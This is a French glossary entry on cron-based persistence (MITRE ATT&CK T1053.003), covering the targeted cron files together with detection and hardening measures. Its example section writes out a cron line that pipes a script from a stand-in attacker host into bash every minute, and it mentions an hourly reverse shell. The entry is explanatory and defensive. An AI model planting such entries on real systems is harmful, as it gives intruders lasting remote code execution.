Persistance via cron
Qu'est-ce que Persistance via cron ?
Persistance via cronTechnique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi.
La persistance via cron (MITRE ATT&CK T1053.003) cible le démon cron et ses variantes (anacron, fcron, timers systemd). Les attaquants ajoutent des entrées dans /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou les crontabs utilisateur (crontab -e). Les charges typiques sont des reverse shells en une ligne, des téléchargements curl ou des scripts placés dans /tmp. Comme cron s'exécute en root ou sous l'utilisateur concerné, la technique est fiable et triviale après l'accès initial. Détection : intégrité des répertoires cron, surveillances auditd, baseline des tâches attendues, alertes EDR sur les shells engendrés par cron. Durcissement : limiter l'accès à crontab, monter /tmp en noexec, activer l'audit systemd-cron lorsque disponible.
● Exemples
- 01
Ajouter * * * * * curl -s http://attaquant/sh | bash à /etc/cron.d/update.
- 02
Déposer un script dans /etc/cron.hourly/ pour rétablir un reverse shell toutes les heures.
● Questions fréquentes
Qu'est-ce que Persistance via cron ?
Technique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi. Cette notion relève de la catégorie Attaques et menaces en cybersécurité.
Que signifie Persistance via cron ?
Technique de persistance Linux/Unix utilisant cron, anacron ou les timers systemd pour réexécuter du code attaquant à un intervalle ou un événement choisi.
Comment se défendre contre Persistance via cron ?
Les défenses contre Persistance via cron combinent habituellement des contrôles techniques et des pratiques opérationnelles, comme détaillé dans la définition ci-dessus.
Quels sont les autres noms de Persistance via cron ?
Noms alternatifs courants : Persistance crontab, Persistance anacron.